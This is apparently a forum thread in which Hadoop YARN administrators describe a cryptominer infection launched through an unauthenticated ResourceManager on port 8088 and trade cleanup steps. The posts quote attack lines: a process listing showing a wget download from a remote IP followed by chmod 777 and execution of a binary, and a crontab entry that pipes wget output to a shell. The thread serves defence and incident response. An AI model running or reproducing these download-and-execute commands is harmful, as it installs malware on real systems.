I'm using HDP 2.6.1. Every ok, but recently, I has problem with Yarn application. I has found type of virus. It work flow:
1. Some service submit yarn application with user name "dr.who"
2. When submit yarn application, on worker will run script container. Script have malware to download Trojan CrytalMiner.
3. Trojan will run via command: /tmp/java -c /tmp/w.conf.
I has kill job, but it will re-run after about 15 minute. I don't know where submit yarn application with user "dr.who"!, Anybody has same problem?. Please check and show how to remove this!
I was struggling with this issue and after spending 2 days I came across to this post. I applied below steps.
1. blocked port 8088 on firewall rules and allowed access to only required IP addresses.
2. killed processed I found with /var/tmp/java -c /var/tmp/w.conf
3. I found a similar entry in crontab at one of our node. I tried to remove it multiple times, but every time it was coming back so I changed the entry to something like below. (I'm not sure whether it is correct way but it started working for me)
***** wget -q -O - http://localhost/xyz.sh
These changes are working at my end and the problem got solved.
Kudos to both of you..!!!
Alright guys, i am facing the same issue and after running crontab command i found
But i am not able to find any running java process may be because my resource manager has exited and it is not operational anymore. Beside i did find a java app in /var/tmp folder, so supposedly i should delete it right ?
Second thing my resource manager provides an warning exits "Dr.who has been converted for dr_dot_who" and it cause it to shut down. Just to clear my confusion, i struggled around one week on this still no result and the main point of suspicion was why yarn is running application, beside i didn't not schedule any queue am i right ? or it runs by own ?
Thanks, please reply ASAP
I have encountered this issue by three different types on some of our open clusters.
1. Crontab - Already covered in the above post
2.Java process - Already covered in the above post
3. Yarn process - We have seen this issue here as a process which runs as yarn user and launches container.
#ps -elf yarn 2239 2238 0 19:56 ? 00:00:00 /bin/bash -c wget http://220.127.116.11/bins/hoho.x86;chmod 777 *;./hoho.x86 Servers yarn 2248 2239 0 19:56 ? 00:00:00 wget http://18.104.22.168/bins/hoho.x86
Resolution: Make sure you have correct security groups. Do not open ports to World.